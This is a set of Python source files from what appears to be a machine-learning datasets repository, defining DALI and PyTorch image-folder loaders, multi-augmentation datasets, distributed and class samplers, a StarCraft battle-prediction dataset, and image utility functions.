image_type=types.RGB)
def __call__(self, images):
true_case = self.op(images,
brightness=self.brightness(),
saturation=self.saturation(),
contrast=self.contrast(),
hue=self.hue())
return self.mux(true_case=true_case, false_case=images)
class CropMirrorNormalize(object):
"""A cleaner version of crop-mirror-normalize."""
def __init__(self, crop=None,
cuda=True,
mean=[0.0, 0.0, 0.0],
std=[1.0, 1.0, 1.0],
flip_prob=0.5):
"""Crops, mirrors horizontally (with prob flip_prob) and normalizes with (x-mean)/std.
:param crop: tuple for cropping or None for not Cropping
:param cuda: are we using cuda?
:param mean: mean to subtract
:param std: std-dev to divide by
:param flip_prob: horizon
:returns: operator
:rtype: object
"""
if crop is not None:
assert isinstance(crop, (tuple, list)), "crop needs to be a tuple/list: (h, w)."
self.cmnp = ops.CropMirrorNormalize(device="gpu" if cuda else "cpu",
crop=crop,
# output_dtype=types.UINT8, #FLOAT,
output_layout=types.NHWC,
image_type=types.RGB,
mean=mean, std=std)
self.coin = ops.CoinFlip(probability=flip_prob)
def __call__(self, images):
rng = self.coin()
return self.cmnp(images, mirror=rng)
class HybridPipeline(Pipeline):
"""A simple DALI image pipeline."""
def __init__(self, data_dir: str, batch_size: int, shuffle: bool = False, device: str = "gpu",
transforms=None, target_transform=None, workers_per_replica: int = 2,
rank: int = 0, num_replicas: int = 1, num_augments: int = 1,
seed: Optional[int] = None, **kwargs):
"""Hybrid NVIDIA-DALI pipeline.
:param data_dir: directory where images are stored.
:param batch_size: batch size
:param shuffle: shuffle dataset?
:param device: cpu or gpu
:param transforms: a list of nvidia dali ops.
:param target_transform: same as pytorch target_transform
:param workers_per_replica: local dataloader threads to use
:param rank: global rank in a DDP setting (or 0 for local)
:param num_replicas: total replicas in the pool
:param num_augments: used if you want multiple augmentations of the image
:param seed: optional seed for dataloader
:returns: Dali pipeline
:rtype: nvidia.dali.pipeline.Pipeline
"""
super(HybridPipeline, self).__init__(batch_size=batch_size,
num_threads=workers_per_replica,
device_id=0, # Always 0 because set via CUDA_VISIBLE_DEVICES
seed=seed if seed is not None else -1)
self.num_augments = num_augments
transform_list = []
if transforms is not None:
assert isinstance(transforms, (tuple, list)), "transforms need to be a list/tuple or None."
transform_list.extend(transforms)
# Convert to CHW for pytorch
transform_list.append(ops.Transpose(device=device, perm=(2, 0, 1)))
self.transforms = transform_list
self.target_transform = target_transform
# The base file reader
self.file_reader = ops.FileReader(file_root=data_dir,
shard_id=rank,
num_shards=num_replicas,
random_shuffle=shuffle)
# The nv-decoder and magic numbers from: https://bit.ly/3cSi359
# Stated there that these sizes reqd for 'full-sized' image net images.
device = "mixed" if device == "gpu" else device
device_memory_padding = 211025920 if device == 'mixed' else 0 # magic numbers
host_memory_padding = 140544512 if device == 'mixed' else 0 # magic numbers
self.decode = ops.ImageDecoder(device=device,
device_memory_padding=device_memory_padding,
host_memory_padding=host_memory_padding,
output_type=types.RGB)
# Set the output_size based on the number of folders in the directory
self.output_size = sum([1 for d in os.listdir(data_dir)
if os.path.isdir(os.path.join(data_dir, d))])
def define_graph(self):
# First just read the image path and labels and then decode them.
images, labels = self.file_reader(name="Reader")
images = self.decode(images)
# Now apply the transforms
if self.transforms:
augmented = []
for _ in range(self.num_augments): # Apply it multiple times if requested
augmented_i = images
for transform in self.transforms:
augmented_i = transform(augmented_i)
augmented.append(augmented_i)
else:
augmented = [images]
# transform the labels if applicable
if self.target_transform:
labels = self.target_transform(labels)
return (*augmented, labels)
def get_local_rank(num_replicas):
"""Helper to return the current distributed rank."""
rank = 0
if num_replicas > 1:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
rank = dist.get_rank()
return rank
class DALIClassificationIteratorLikePytorch(DALIClassificationIterator):
def __next__(self):
"""Override this to return things like pytorch."""
sample = super(DALIClassificationIteratorLikePytorch, self).__next__()
if sample is not None and len(sample) > 0:
if isinstance(sample[0], dict):
images = sample[0]["data"]
labels = sample[0]["label"]
else:
images, labels = sample
return images.float() / 255, labels.squeeze().long()
class DALIImageFolderLoader(AbstractLoader):
"""Simple DALI image-folder loader, but doesn't follow normal AbstractLoader."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None, valid_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
valid_transform=None, valid_target_transform=None,
cuda=True, num_augments=1, **kwargs):
rank = get_local_rank(num_replicas)
# Build the train dataset and loader
train_kwargs = deepcopy(kwargs)
train_kwargs['seed'] = train_kwargs.get('seed', 1234 + rank) or 1234 + rank # different RNG per replica
train_dataset = HybridPipeline(data_dir=os.path.join(path, 'train'),
batch_size=batch_size,
shuffle=True,
device="gpu" if cuda else "cpu",
transforms=train_transform,
target_transform=train_target_transform,
rank=rank, num_replicas=num_replicas,
num_augments=num_augments, **train_kwargs)
train_dataset.build()
self.train_loader = MultiAugmentDALIClassificationIterator(
train_dataset, size=train_dataset.epoch_size("Reader") // num_replicas,
fill_last_batch=True,
last_batch_padded=True,
auto_reset=True,
num_augments=num_augments
)
# Build the test dataset and loader
val_test_kwargs = deepcopy(kwargs)
val_test_kwargs['seed'] = 1234 + rank # Fixed shuffle for each replica
test_dataset = HybridPipeline(data_dir=os.path.join(path, 'test'),
batch_size=batch_size,
shuffle=False,
device="gpu" if cuda else "cpu",
transforms=test_transform,
target_transform=test_target_transform,
rank=0, num_replicas=1, # Use FULL test set on each replica
num_augments=num_augments, **val_test_kwargs)
test_dataset.build()
self.test_loader = MultiAugmentDALIClassificationIterator(test_dataset, size=test_dataset.epoch_size("Reader"),
fill_last_batch=True,
last_batch_padded=True,
auto_reset=True,
num_augments=num_augments)
# Build the valid dataset and loader
self.valid_loader = None
if os.path.isdir(os.path.join(path, 'valid')):
valid_dataset = HybridPipeline(data_dir=os.path.join(path, 'valid'),
batch_size=batch_size,
shuffle=True,
device="gpu" if cuda else "cpu",
transforms=valid_transform,
target_transform=valid_target_transform,
rank=rank, num_replicas=num_replicas,
num_augments=num_augments, **val_test_kwargs)
valid_dataset.build()
self.valid_loader = MultiAugmentDALIClassificationIterator(
valid_dataset, size=valid_dataset.epoch_size("Reader") // num_replicas,
fill_last_batch=True,
last_batch_padded=True,
auto_reset=True,
num_augments=num_augments
)
# Set the dataset lengths if they exist.
self.num_train_samples = train_dataset.epoch_size("Reader")
self.num_test_samples = test_dataset.epoch_size("Reader")
self.num_valid_samples = valid_dataset.epoch_size("Reader") \
if self.valid_loader is not None else 0
print("train = {} | test = {} | valid = {}".format(
self.num_train_samples, self.num_test_samples, self.num_valid_samples))
# grab a test sample to get the size
sample = self.train_loader.__iter__().__next__()
self.input_shape = list(sample[0].size()[1:])
print("derived image shape = ", self.input_shape)
# derive the output size using the imagefolder attr
self.loss_type = 'ce' # TODO: try to automagic this later.
self.output_size = train_dataset.output_size
print("derived output size = ", self.output_size)
def set_all_epochs(self, epoch):
"""No-op here as it is handled via the pipeline already."""
pass
def set_epoch(self, epoch, split):
"""No-op here as it is handled via the pipeline already."""
pass
class MultiAugmentDALIClassificationIterator(DALIGenericIterator):
"""Only change is the output map to accommodate multiple augmentations."""
def __init__(self,
pipelines,
size,
auto_reset=False,
fill_last_batch=True,
dynamic_shape=False,
last_batch_padded=False,
num_augments=2):
output_map = ["data{}".format(i) for i in range(num_augments)] + ["label"]
super(MultiAugmentDALIClassificationIterator, self).__init__(pipelines, output_map,
size, auto_reset=auto_reset,
fill_last_batch=fill_last_batch,
dynamic_shape=dynamic_shape,
last_batch_padded=last_batch_padded)
def __next__(self):
"""Override this to return things like pytorch."""
sample = super(MultiAugmentDALIClassificationIterator, self).__next__()
if sample is not None and len(sample) > 0:
if isinstance(sample[0], dict):
images = [sample[0][k] for k in sample[0].keys() if "data" in k]
labels = sample[0]["label"]
else:
labels = sample[-1]
images = sample[0:-1]
for idx in range(len(images)):
images[idx] = images[idx].float() / 255
return [*images, labels.squeeze().long()]
class MultiAugmentDALIImageFolderLoader(DALIImageFolderLoader):
"""Differs from above with num_augments returning multiple copies of the image augmentation."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None, valid_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
valid_transform=None, valid_target_transform=None,
num_augments=2, cuda=True, **kwargs):
super(MultiAugmentDALIImageFolderLoader, self).__init__(
path=path, batch_size=batch_size, num_replicas=num_replicas,
train_sampler=train_sampler, test_sampler=test_sampler, valid_sampler=valid_sampler,
train_transform=train_transform, train_target_transform=train_target_transform,
test_transform=test_transform, test_target_transform=test_target_transform,
valid_transform=valid_transform, valid_target_transform=valid_target_transform,
num_augments=num_augments, # The only difference here is that we set multiple augmentations
cuda=cuda, **kwargs
)
```
#### File: jramapuram/datasets/imagefolder.py
```python
import os
import functools
from torchvision import datasets, transforms
from torchvision.datasets.folder import default_loader
from .abstract_dataset import AbstractLoader
class ImageFolderLoader(AbstractLoader):
"""Simple pytorch image-folder loader."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None, valid_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
valid_transform=None, valid_target_transform=None,
cuda=True, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(datasets.ImageFolder, root=os.path.join(path, 'train'))
test_generator = functools.partial(datasets.ImageFolder, root=os.path.join(path, 'test'))
valid_generator = None
if os.path.isdir(os.path.join(path, 'valid')):
valid_generator = functools.partial(datasets.ImageFolder, root=os.path.join(path, 'valid'))
super(ImageFolderLoader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
valid_dataset_generator=valid_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
valid_sampler=valid_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
valid_transform=valid_transform,
valid_target_transform=valid_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
# grab a test sample to get the size
test_img, _ = self.train_loader.__iter__().__next__()
self.input_shape = list(test_img.size()[1:])
print("derived image shape = ", self.input_shape)
# derive the output size using the imagefolder attr
self.loss_type = 'ce' # TODO: how to incorporate other features?
self.output_size = len(self.train_loader.dataset.classes)
print("derived output size = ", self.output_size)
class MultiAugmentImageDataset(datasets.ImageFolder):
"""Extends imagefolder to simply augment the same image num_augments times."""
def __init__(self, root, transform=None, target_transform=None, non_augmented_transform=None,
loader=default_loader, is_valid_file=None, num_augments=2):
assert num_augments > 1, "Use this dataset when you want >1 augmentations"
self.num_augments = num_augments # Number of times to augment the same image
self.non_augment_transform = non_augmented_transform # transform for non-augmented image (eg: resize)
super(MultiAugmentImageDataset, self).__init__(
root=root, transform=transform, target_transform=target_transform,
loader=default_loader, is_valid_file=is_valid_file)
def __getitem_non_transformed__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (sample, target) where target is class_index of the target class.
"""
path, target = self.samples[index]
sample = self.loader(path)
if self.non_augment_transform is not None:
sample = self.non_augment_transform(sample)
if self.target_transform is not None:
target = self.target_transform(target)
return sample, target
def __getitem__(self, index):
"""Label is the same for index, so just run augmentations again."""
sample0, target = self.__getitem_non_transformed__(index)
samples = [sample0] + [super(MultiAugmentImageDataset, self).__getitem__(index)[0]
for _ in range(self.num_augments)]
return samples + [target]
class MultiAugmentImageFolder(AbstractLoader):
"""Runs multiple augmentations PER image and returns."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None, valid_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
valid_transform=None, valid_target_transform=None,
non_augmented_transform=None, # The first image returned is non-augmented, useful for resize, etc.
cuda=True, num_augments=2, **kwargs):
# Curry the train and test dataset generators.
train_generator = functools.partial(MultiAugmentImageDataset,
root=os.path.join(path, 'train'),
non_augmented_transform=self.compose_transforms(non_augmented_transform),
num_augments=num_augments)
test_generator = functools.partial(MultiAugmentImageDataset,
root=os.path.join(path, 'test'),
non_augmented_transform=self.compose_transforms(non_augmented_transform),
num_augments=num_augments)
valid_generator = None
if os.path.isdir(os.path.join(path, 'valid')):
valid_generator = functools.partial(MultiAugmentImageDataset,
root=os.path.join(path, 'valid'),
num_augments=num_augments)
super(MultiAugmentImageFolder, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
valid_dataset_generator=valid_generator,
train_sampler=train_sampler,
test_sampler=test_sampler,
valid_sampler=valid_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
valid_transform=valid_transform,
valid_target_transform=valid_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
# grab a test sample to get the size
train_samples_and_labels = self.train_loader.__iter__().__next__()
self.input_shape = list(train_samples_and_labels[0].size()[1:])
print("derived image shape = ", self.input_shape)
# derive the output size using the imagefolder attr
self.loss_type = 'ce' # TODO: how to incorporate other features?
self.output_size = len(self.train_loader.dataset.classes)
print("derived output size = ", self.output_size)
```
#### File: jramapuram/datasets/samplers.py
```python
import math
import torch
import numpy as np
import torch.distributed as dist
from torch.utils.data.dataset import Subset
from torch.utils.data.sampler import Sampler
import datasets.utils as utils
class FixedRandomSampler(Sampler):
"""Does a SINGLE fixed random transform of the dataset."""
def __init__(self, data_source):
self.data_source = data_source
with utils.temp_seed(1234):
self.fixed_perm = np.random.permutation(len(self.data_source))
def __iter__(self):
return iter(self.fixed_perm)
def __len__(self):
return len(self.data_source)
class ClassSampler(Sampler):
"""Sampler that restricts data loading to a single class of the dataset.
.. note::
Dataset is assumed to be of constant size.
Arguments:
dataset: Dataset used for sampling.
class_number: The class index to filter out.
This can be a list as well to handle
multiple classes.
"""
def __init__(self, class_number, shuffle=True):
assert class_number is not None
self.class_number = class_number
self.shuffle = shuffle
def __call__(self, dataset, class_number=None):
''' helps to recompute indices '''
if class_number is None:
class_number = self.class_number
# if we receive a list, then iterate over this sequentially
if isinstance(class_number, list):
self.indices = []
self.num_samples = 0
for cn in class_number:
indices, num_samples = self._calc_indices(dataset, cn)
self.indices += indices
self.num_samples += num_samples
else:
self.indices, self.num_samples = self._calc_indices(dataset, class_number)
# DEBUG print:
# print("#indices for {} = {} | dataset = {}".format(self.class_number,
# len(self.indices),
# len(self.dataset)))
# set the current dataset as a subset
self.dataset = Subset(dataset, self.indices)
return self.dataset
@staticmethod
def _calc_indices(dataset, class_number):
indices = [i for i, (_, target) in enumerate(dataset) if target == class_number]
return indices, len(indices)
def __iter__(self):
assert hasattr(self, 'indices'), "need to run __call__() on ClassSampler first"
if self.shuffle:
return (self.indices[i] for i in torch.randperm(len(self.indices)))
return (self.indices[i] for i in range(len(self.indices)))
def __len__(self):
return self.num_samples
class GeneralDistributedSampler(Sampler):
"""Sampler that restricts data loading to a subset of the dataset.
Sourced from https://bit.ly/3eq7MP9 to enable padding.
It is especially useful in conjunction with
:class:`torch.nn.parallel.DistributedDataParallel`. In such case, each
process can pass a DistributedSampler instance as a DataLoader sampler,
and load a subset of the original dataset that is exclusive to it.
.. note::
Dataset is assumed to be of constant size.
Arguments:
dataset: Dataset used for sampling.
num_replicas (optional): Number of processes participating in
distributed training.
rank (optional): Rank of the current process within num_replicas.
pad: pad data by replicating samples
"""
def __init__(self, dataset, num_replicas=None, rank=None, shuffle=True, pad=True):
if num_replicas is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
num_replicas = dist.get_world_size()
if rank is None:
if not dist.is_available():
raise RuntimeError("Requires distributed package to be available")
rank = dist.get_rank()
self.dataset = dataset
self.num_replicas = num_replicas
self.rank = rank
self.pad = pad
self.epoch = 0
self.shuffle = shuffle
if self.pad:
self.num_samples = int(math.ceil(len(self.dataset) * 1.0 / self.num_replicas))
self.total_size = self.num_samples * self.num_replicas
else:
self.num_samples = int(math.ceil((len(self.dataset) - self.rank) * 1.0 / self.num_replicas))
self.total_size = len(self.dataset)
def __iter__(self):
# deterministically shuffle based on epoch
g = torch.Generator()
g.manual_seed(self.epoch)
if self.shuffle:
indices = torch.randperm(len(self.dataset), generator=g).tolist()
else:
indices = list(range(len(self.dataset)))
# add extra samples to make it evenly divisible
if self.pad:
indices += indices[:(self.total_size - len(indices))]
assert len(indices) == self.total_size
# subsample
indices = indices[self.rank:self.total_size:self.num_replicas]
assert len(indices) == self.num_samples
return iter(indices)
def __len__(self):
return self.num_samples
def set_epoch(self, epoch):
self.epoch = epoch
```
#### File: jramapuram/datasets/starcraft_predict_battle.py
```python
import os
import functools
import pandas as pd
import numpy as np
import torch
import torchvision.transforms.functional as F
from PIL import Image
from .utils import temp_seed
from .abstract_dataset import AbstractLoader
def pil_loader(path):
# open path as file to avoid ResourceWarning :
# https://github.com/python-pillow/Pillow/issues/835
with open(path, 'rb') as f:
with Image.open(f) as img:
# return img.convert('L')
return img.convert('RGB')
def to_binary(arr):
return arr.dot(2**np.arange(arr.shape[-1])[::-1])
def one_hot_np(num_cols, indices):
num_rows = len(indices)
mat = np.zeros((num_rows, num_cols))
mat[np.arange(num_rows), indices] = 1
return mat
def one_hot(feature_matrix):
assert len(feature_matrix.shape) == 2
maxes = [feature_matrix[:, i].max() for i in range(feature_matrix.shape[-1])]
column_features = [one_hot_np(max_val+1, col) for max_val, col in zip(maxes, feature_matrix.T)]
stacked = np.concatenate(column_features, -1)
# return to_binary(stacked)
return stacked
def read_classes(csv_name='predictions.csv'):
""" count_fields = ['marine_count',
'marauder_count',
'siegetank_count',
'siegetanksieged_count',
'zergling_present',
'baneling_present',
'hydralisk_present',
'zerg_lost',
'terran_lost']
"""
parsed = pd.read_csv(csv_name)
# classes = np.concatenate([np.expand_dims(parsed[k], 1) for k in count_fields], 1)
# classes = one_hot(classes)
classes = parsed['marine_count'].values.astype(np.int64)
# # filter out the 0 marine elements since it is heavy tailed
# idx = classes > 0
# classes = classes[idx]
# remove the large classes which shouldn't be there
idx2 = classes < 23
classes = classes[idx2]
filenames = {
'relative_path': parsed['relative_img'].values[idx2],
'fullscreen_path': parsed['fullscreen_img'].values[idx2],
'minimap_path': parsed['minimap_img'].values[idx2]
# 'relative_path': parsed['relative_img'].values[idx][idx2],
# 'fullscreen_path': parsed['fullscreen_img'].values[idx][idx2],
# 'minimap_path': parsed['minimap_img'].values[idx][idx2]
}
return classes, filenames
class StarcraftPredictBattleDataset(torch.utils.data.Dataset):
"""Starcraft predict battle dataset."""
def __init__(self, path, split='train', transform=None, aux_transform=None, target_transform=None):
self.split = split
self.path = os.path.expanduser(path)
self.loader = pil_loader
self.transform = transform
self.aux_transform = aux_transform
self.target_transform = target_transform
# hard-coded
# self.output_size = 124
self.output_size = 22 + 1 # 22 marines + 0 case
# load the images-paths and labels
self.labels, self.img_names = read_classes(os.path.join(self.path, "predictions.csv"))
assert len(self.img_names['fullscreen_path']) == len(self.labels)
# determine train-test split
num_test = int(len(self.labels) * 0.2)
num_train = len(self.labels) - num_test
if split == 'train':
self.img_names = {
'relative_path': self.img_names['relative_path'][0:num_train],
'fullscreen_path': self.img_names['fullscreen_path'][0:num_train],
'minimap_path': self.img_names['minimap_path'][0:num_train]
}
self.labels = self.labels[0:num_train]
else:
self.img_names = {
'relative_path': self.img_names['relative_path'][-num_test:],
'fullscreen_path': self.img_names['fullscreen_path'][-num_test:],
'minimap_path': self.img_names['minimap_path'][-num_test:]
}
self.labels = self.labels[-num_test:]
with temp_seed(1234): # Fixed random shuffle of test set
rnd_perm = np.random.permutation(np.arange(len(self.img_names)))
self.img_names, self.labels = self.img_names[rnd_perm], self.labels[rnd_perm]
print("[{}] {} samples".format(split, len(self.labels)))
def __getitem__(self, index):
target = self.labels[index]
fullscreen = self.loader(os.path.join(self.path, self.img_names['fullscreen_path'][index]))
minimap = self.loader(os.path.join(self.path, self.img_names['minimap_path'][index]))
if self.transform is not None:
minimap = self.transform(minimap)
if self.aux_transform is not None:
fullscreen = self.transform(fullscreen)
if not isinstance(fullscreen, torch.Tensor):
fullscreen = F.to_tensor(fullscreen)
if self.target_transform is not None:
target = self.target_transform(target)
return [minimap, fullscreen], target
def __len__(self):
return len(self.labels)
def compute_sampler_weighting(path):
''' reads the classes, computes the weights and then does :
1.0 - #samples / #total_samples '''
classes, _ = read_classes(os.path.join(path, "predictions.csv"))
hist, _ = np.histogram(classes, classes.max()+1)
num_samples = len(classes)
# weights_unbalanced = [hist[i] for i in classes]
# weights = [1.0 - (w / num_samples) for w in weights_unbalanced]
weights = [hist[i] for i in classes]
# compute train - test weighting
num_test = int(num_samples * 0.2)
num_train = num_samples - num_test
weights_train = weights[0:num_train]
weights_test = weights[-num_test:]
# don't need this anymore
del classes # help out the GC a bit
# return reciprocal weights
return [1.0 / np.array(weights_train),
1.0 / np.array(weights_test)]
class StarcraftPredictBattleLoader(AbstractLoader):
"""SC2 predict battle loader, there is no validation set."""
def __init__(self, path, batch_size, num_replicas=1,
train_sampler=None, test_sampler=None,
train_transform=None, train_target_transform=None,
test_transform=None, test_target_transform=None,
cuda=True, output_size=None, **kwargs):
# derive the weighted samplers
assert train_sampler is None, "sc2 loader uses weighted sampler"
assert test_sampler is None, "sc2 loader uses weighted sampler"
weights_train, weights_test = compute_sampler_weighting(path)
train_sampler = torch.utils.data.sampler.WeightedRandomSampler(weights=weights_train,
num_samples=len(weights_train))
test_sampler = torch.utils.data.sampler.WeightedRandomSampler(weights=weights_test,
num_samples=len(weights_test))
# Use the same train_transform for aux_transform
aux_transform = self.compose_transforms(train_transform)
# Curry the train and test dataset generators.
train_generator = functools.partial(StarcraftPredictBattleDataset,
path=path, split='train',
aux_transform=aux_transform)
test_generator = functools.partial(StarcraftPredictBattleDataset,
path=path, split='test')
# use the abstract class to build the loader
super(StarcraftPredictBattleLoader, self).__init__(batch_size=batch_size,
train_dataset_generator=train_generator,
test_dataset_generator=test_generator,
train_sampler=train_sampler,
test_selfampler=test_sampler,
train_transform=train_transform,
train_target_transform=train_target_transform,
test_transform=test_transform,
test_target_transform=test_target_transform,
num_replicas=num_replicas, cuda=cuda, **kwargs)
# self.output_size = 124 # fixed
# self.loss_type = 'bce' # fixed
self.output_size = 22 + 1 # fixed
self.loss_type = 'ce' # fixed
print("derived output size = ", self.output_size)
# grab a test sample to get the size
[test_minimap, _], _ = self.train_loader.__iter__().__next__()
self.img_shp = list(test_minimap.size()[1:])
print("derived image shape = ", self.img_shp)
```
#### File: jramapuram/datasets/utils.py
```python
import cv2
import torch
import contextlib
import numpy as np
from typing import Tuple
from copy import deepcopy
from PIL import Image
from torchvision import transforms
import datasets.loader as ldr
from datasets.samplers import ClassSampler, FixedRandomSampler
cv2.setNumThreads(0) # since we use pytorch workers
def resize_lambda(img, size: Tuple[int, int]):
"""converts np image to cv2 and resize."""
if not isinstance(img, (np.float32, np.float64)):
img = np.asarray(img)
if not isinstance(size, tuple):
size = tuple(size)
return cv2.resize(img, size)
def permute_lambda(img, pixel_permutation):
"""Permute pixels using provided pixel_permutation"""
if not isinstance(img, (np.float32, np.float64)):
img = np.asarray(img)
img_orig_shape = img.shape
return Image.fromarray(
img.reshape(-1, 1)[pixel_permutation].reshape(img_orig_shape)
)
class GaussianBlur(object):
"""Gaussian blur implementation; modified from: https://bit.ly/2WcVfWS """
def __init__(self, kernel_size, min=0.1, max=2.0, p=0.5):
self.min = min
self.max = max
self.prob = p
self.kernel_size = int(np.ceil(kernel_size) // 2 * 2 + 1) # creates nearest odd number [cv2 req]
def __call__(self, sample):
sample = np.array(sample)
if np.random.random_sample() > self.prob:
sigma = (self.max - self.min) * np.random.normal() + self.min
sample = cv2.GaussianBlur(sample, (self.kernel_size, self.kernel_size), sigma)
return transforms.ToPILImage()(sample) # back to PIL land
# from https://tinyurl.com/yy3hyz4d
# sets a temporary numpy seed in scoped context
# eg: with temp_seed(1234):
@contextlib.contextmanager
def temp_seed(seed):
state = np.random.get_state()
np.random.seed(seed)
try:
yield
finally:
np.random.set_state(state)
def normalize_images(imgs, mu=None, sigma=None, eps=1e-9):
"""Normalize imgs with provided mu /sigma
or computes them and returns with the normalized
images and tabulated mu / sigma
:param imgs: list of images
:param mu: (optional) provided mean
:param sigma: (optional) provided sigma
:param eps: tolerance
:returns: normalized images
:rtype: type(imgs), [mu, sigma]
"""
if mu is None:
if len(imgs.shape) == 4:
chans = imgs.shape[1]
mu = np.asarray(
[np.mean(imgs[:, i, :, :]) for i in range(chans)]
).reshape(1, -1, 1, 1)
elif len(imgs.shape) == 5: # glimpses
chans = imgs.shape[2]
mu = np.asarray(
[np.mean(imgs[:, :, i, :, :]) for i in range(chans)]
).reshape(1, 1, -1, 1, 1)
sigma = np.asarray(
[np.std(imgs[:, :, i, :, :]) for i in range(chans)]
).reshape(1, 1, -1, 1, 1)
else:
raise Exception("unknown number of dims for normalization")
if sigma is None:
if len(imgs.shape) == 4:
chans = imgs.shape[1]
sigma = np.asarray(
[np.std(imgs[:, i, :, :]) for i in range(chans)]
).reshape(1, -1, 1, 1)
elif len(imgs.shape) == 5: # glimpses
chans = imgs.shape[2]
sigma = np.asarray(
[np.std(imgs[:, :, i, :, :]) for i in range(chans)]
).reshape(1, 1, -1, 1, 1)
else:
raise Exception("unknown number of dims for normalization")
return (imgs - mu) / (sigma + eps), [mu, sigma]
def normalize_train_test_images(train_imgs, test_imgs, eps=1e-9):
''' simple helper to take train and test images
and normalize the test images by the train mu/sigma '''
train_imgs, [mu, sigma] = normalize_images(train_imgs, eps=eps)
return [train_imgs, normalize_images(test_imgs, mu=mu, sigma=sigma, eps=eps)]
def bw_2_rgb_lambda(img):
"""simple helper to convert BG to RGB."""
if img.mode == "RGB":
return img
return img.convert(mode="RGB")
def binarize(img, block_size: int = 21):
"""Uses Otsu-thresholding to binarize an image."""
if not isinstance(img, (np.float32, np.float64)):
img = np.asarray(img)
img = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,
cv2.THRESH_BINARY, block_size, 0)
return np.expand_dims(img, -1) if len(img.shape) < 3 else img
def find_max_label(loader):
"""iterate over loader and find the max label size."""
max_label = 0
for _, lbls in loader:
max_seen_lbl = max(lbls)
if max_seen_lbl > max_label:
max_label = max_seen_lbl
return max_label
def label_offset_merger(loaders, batch_size, use_cuda=False):
''' iterate over all the loaders and:
1. finds the max labels
2. increments loader2 with +loader1_max_label
3. build a new loader with all the data [uses simple_merger]'''
# step 1
max_labels_train = [find_max_label(loader.train_loader) for loader in loaders]
max_labels_test = [find_max_label(loader.test_loader) for loader in loaders]
max_labels = np.maximum(max_labels_test, max_labels_train) + 1
for j in range(1, len(max_labels)):
max_labels[j] += max_labels[j - 1]
print('determined offset max_labels: ', max_labels)
max_labels = torch.from_numpy(max_labels.astype(np.int32))
# step 2
def _extract_and_increment(loader, idx):
data_container, lbl_container = [], []
for data, labels in loader: # extract all the data
data_container.append(data)
lbl_container.append(labels)
# handle data concat
if isinstance(data_container[0], torch.Tensor):
data_container = torch.cat(data_container, 0)
elif isinstance(data_container[0], np.array):
data_container = torch.from_numpy(np.vstack(data_container))
else:
raise Exception("unknown data type")
# handle label concat
if isinstance(lbl_container[0], torch.Tensor):
lbl_container = torch.cat(lbl_container, 0)
elif isinstance(lbl_container[0], np.array):
lbl_container = torch.from_numpy(np.vstack(lbl_container))
else:
raise Exception("unknown label type")
# do the actual incrementing
lbl_container += max_labels[idx - 1]
dataset = torch.utils.data.TensorDataset(data_container, lbl_container)
kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}
return torch.utils.data.DataLoader(
dataset=dataset,
batch_size=loader.batch_size,
drop_last=True,
shuffle=True,
**kwargs
)
# recreate the fucking loaders
for i in range(1, len(max_labels)):
loaders[i].train_loader = _extract_and_increment(loaders[i].train_loader, i)
loaders[i].test_loader = _extract_and_increment(loaders[i].test_loader, i)
loaders[i].output_size = max_labels[i].cpu().item()
# step3: finally merge them with simpleMerger
return simple_merger(loaders, batch_size, use_cuda)
def simple_merger(loaders):
"""Merges train and test datasets given a list of loaders."""
print("""\nWARN [simplemerger]: no process in place for handling different classes,
ignore this if you called label_offset_merger\n""")
has_valid = np.all([hasattr(l, 'valid_loader') for l in loaders])
splits = ['train', 'test'] if not has_valid else ['train', 'test', 'valid']
for split in splits:
loaders = sequential_dataset_merger(
loaders, split, fixed_shuffle=(split == 'test')) # fixed shuffle test set
return loaders[-1]
def create_loader(dataset, sampler, batch_size, shuffle,
pin_memory=True, drop_last=True,
num_workers=0, timeout=0, worker_init_fn=None):
"""Given a dataset and a sampler creates a torch dataloader.
A little extra wizardry for ClassSampler.
:param dataset: the dataset to wrap
:param sampler: what sampler to use
:param batch_size: batch size for dataloader
:param shuffle: whether to shuffle or not
:param pin_memory: pin memory to CUDA
:param drop_last: drop the last elems to not have smaller batch size
:param num_workers: >0 if distributed
:param timeout: timeout for collecting batch from worker
:param worker_init_fn: lambda wid: do_something(wid)
:returns: a dataloader
:rtype: torch.utils.data.Dataloader
"""
if isinstance(sampler, ClassSampler):
# our sampler is hacky; just filters dataset
# and nulls itself out for GC
dataset = sampler(dataset)
sampler = None
return torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
drop_last=drop_last,
shuffle=shuffle,
pin_memory=pin_memory,
sampler=sampler,
num_workers=num_workers,
timeout=timeout,
worker_init_fn=worker_init_fn)
def sequential_dataset_merger(loaders, split='test', fixed_shuffle=False):
"""Given a list of loaders, merge their test/train/valid sets in each new loader.
Other splits (split != split) are kept the same.
Eg: [L1, L2, L3] --> [split(L1), split(L1+L2), split(L1+L2+L3)].
:param loaders: list of loaders with .'split'_loader member populated
:param split: dataset split, eg: test, train, valid
:param fixed_shuffle: forces a single FIXED shuffle (useful when merging test sets).
:returns: the list of loaders with the merge completed.
:rtype: list
"""
# Grab the underlying dataset
datasets = [getattr(l, split + "_loader").dataset for l in loaders]
